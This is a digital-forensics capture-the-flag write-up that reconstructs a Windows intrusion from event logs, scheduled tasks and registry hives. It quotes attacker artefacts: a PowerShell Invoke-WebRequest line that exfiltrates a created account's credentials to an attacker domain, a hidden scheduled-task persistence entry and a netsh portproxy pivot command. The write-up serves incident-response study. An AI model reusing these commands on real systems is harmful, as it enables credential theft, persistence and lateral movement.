Description

LeStrade passes a disk image artifacts to Watson. It’s one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

TL;DR

  • First attacker command:
    systeminfo (from Security.evtx Event ID 4688, first non‑cd, non‑alias command executed via cmd.exe)
  • Parent process spawning commands:
    C:\Windows\System32\wbem\WmiPrvSE.exe (from 4688 event creating cmd.exe -> parent process field)
  • Remote execution tool:
    wmiexec.py (from cmd.exe command line with \\127.0.0.1\ADMIN$ redirection, hallmark of Impacket’s wmiexec)
  • Attacker’s IP address:
    10.129.242.110 (from Security.evtx Event ID 4624 network logon, IpAddress field)
  • First persistence element:
    SysHelper Update (from malicious Scheduled Task XML in C:\Windows\System32\Tasks\SysHelper Update)
  • Persistence script executed: C:\Users\Werni\AppData\Local\JM.ps1
    (from scheduled task definition, PowerShell arguments)
  • Local account created:
    svc_netupd (from Security.evtx Event ID 4720, account creation)
  • Credential exfiltration domain:
    NapoleonsBlackPearl.htb (from Invoke-WebRequest in JM.ps1)
  • Generated password:
    Watson_20250824160509 (JM.ps1 pattern + timezone bias (UTC‑7) + Event 4720 time)
  • Internal pivot IP:
    192.168.1.101 (from netsh portproxy command line parameters)
  • Forwarded TCP port:
    9999 (listenport in netsh command line)
  • Registry path for portproxy rules:
    HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp (from Windows portproxy persistence location)
  • MITRE ATT&CK ID (pivot technique):
    T1090.001 (Proxy: Internal Proxy – adversary using built-in portproxy for lateral pivoting)
  • Admin command enabling command line logging:
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f (from Administrator’s ConsoleHost_history.txt)

Solution

For this challenge, we get a Windows disk to examine.

What was the first (non cd) command executed by the attacker on the host? (string)

Parsing the Security logs (C:\Windows\System32\winevt\Logs\Security.evtx) using python3 evtx_dump.py /mnt/win/Windows/System32/winevt/Logs/Security.evtx, we can search the output for process creation events (4688). The first entry we find with cmd.exe as the parent is the following:

<EventID>4688</EventID>
<TimeCreated SystemTime="2025-08-24T22:51:09Z"/>
<NewProcessName>C:\Windows\System32\systeminfo.exe</NewProcessName>
<CommandLine>systeminfo</CommandLine>
<ParentProcessName>C:\Windows\System32\cmd.exe</ParentProcessName>

This shows the first attacker command was systeminfo executed via cmd.exe.

Answer: systeminfo

Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)

Looking for the process creation events for cmd.exe, we find this entry:

<NewProcessName>C:\Windows\System32\cmd.exe</NewProcessName>
<CommandLine>cmd.exe /Q /c systeminfo 1&gt; \\127.0.0.1\ADMIN$\__1756075857.955773 2&gt;&amp;1</CommandLine>
<ParentProcessName>C:\Windows\System32\wbem\WmiPrvSE.exe</ParentProcessName>

Here we find the ParentProcessName.

Answer: C:\Windows\System32\wbem\WmiPrvSE.exe

Which remote-execution tool was most likely used for the attack? (filename.ext)

The command line cmd.exe /Q /c systeminfo 1&gt; \\127.0.0.1\ADMIN$\__1756075857.955773 2&gt;&amp;1 indicates the use of Impacket’s wmiexec.py tool as described by the blog post Defense Against the Lateral Arts: Detecting and Preventing Impacket’s Wmiexec.

Answer: wmiexec.py

What was the attacker’s IP address? (IPv4 address)

To find the IP address, we can search the parsed Security logs for Successful logon events (4624). One of those events with the LogonType 3 (network logon) is the following:

<Data Name="IpAddress">10.129.242.110</Data>
<Data Name="LogonType">3</Data>

In the IpAddress property, we find the attacker’s IP address.

Answer: 10.129.242.110

What is the first element in the attacker’s sequence of persistence mechanisms? (string)

In the Windows\System32\Tasks\ directory we can find SysHelper Update.
This task was configured to execute a hidden PowerShell process calling JM.ps1.

<URI>\SysHelper Update</URI>
<Exec>
  <Command>powershell</Command>
  <Arguments>-ExecutionPolicy Bypass -File C:\Users\Werni\AppData\Local\JM.ps1</Arguments>
</Exec>

So the first element is the task name.

Answer: SysHelper Update

Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)

From the task configuration, we can find the path of the JM.ps1 script.

Answer: C:\Users\Werni\AppData\Local\JM.ps1

What local account did the attacker create? (string)

In the Security logs, we can search for Account Creation events (4720). Here we find the following entry:

<EventID>4720</EventID>
<TargetUserName>svc_netupd</TargetUserName>
<TimeCreated SystemTime="2025-08-24T23:05:09Z"/>

The TargetUserName field shows the newly created account: svc_netupd.

Answer: svc_netupd

What domain name did the attacker use for credential exfiltration? (domain)

In the malicious PowerShell script, we find the domain the attacker used.

Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null

Answer: NapoleonsBlackPearl.htb

What password did the attacker’s script generate for the newly created user? (string)

The password generation in the scripts looks like this:

$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password  = "Watson_$timestamp"

Which means that the password was generated with a timestamp at the time of execution. If we take a look at the time of the creation of the svc_netupd create user event, we get the timestamp.

<TimeCreated SystemTime="2025-08-24T23:05:09.764658Z">

Since Get-Date uses local system time, we have to find the timezone used by the system. To do this, we can open the SYSTEM hive and check the TimeZoneInformation. The followind Python script will extract the timezone.

from Registry import Registry

reg = Registry.Registry("The_Enduring_Echo/C/Windows/System32/config/SYSTEM")
tz_key = reg.open("ControlSet001\\Control\\TimeZoneInformation")
for v in tz_key.values():
    print(v.name(), v.value())

This returns Pacific Standard Time. To convert the TimeCreated timestamp, we have to subtract 7 hours: 2025‑08‑24 16:05:09. Formatting this according to the scripts formatting, we get the generated password.

Answer: Watson_20250824160509

What was the IP address of the internal system the attacker pivoted to? (IPv4 address)

In the Security logs, we can find a netsh process setting up a proxy.

netsh interface portproxy add v4tov4 listenport=9999 connectaddress=192.168.1.101 connectport=22

The connectaddress parameter contains the IP address we’re looking for.

Answer: 192.168.1.101

Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)

In the previous log entry, we can find the port in the listenport parameter.

Answer: 9999

What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM……)

In the blog post Pivoting: Setting up a port proxy with netsh on Windows, we find the full registry path.

Answer: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)

Searching MITRE ATT&CK, we find the id.

Answer: T1090.001

Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)

In the ConsoleHost_history.txt file at /The_Enduring_Echo/C/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt, we find an entry enabling the inclusion of command line.

Answer: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f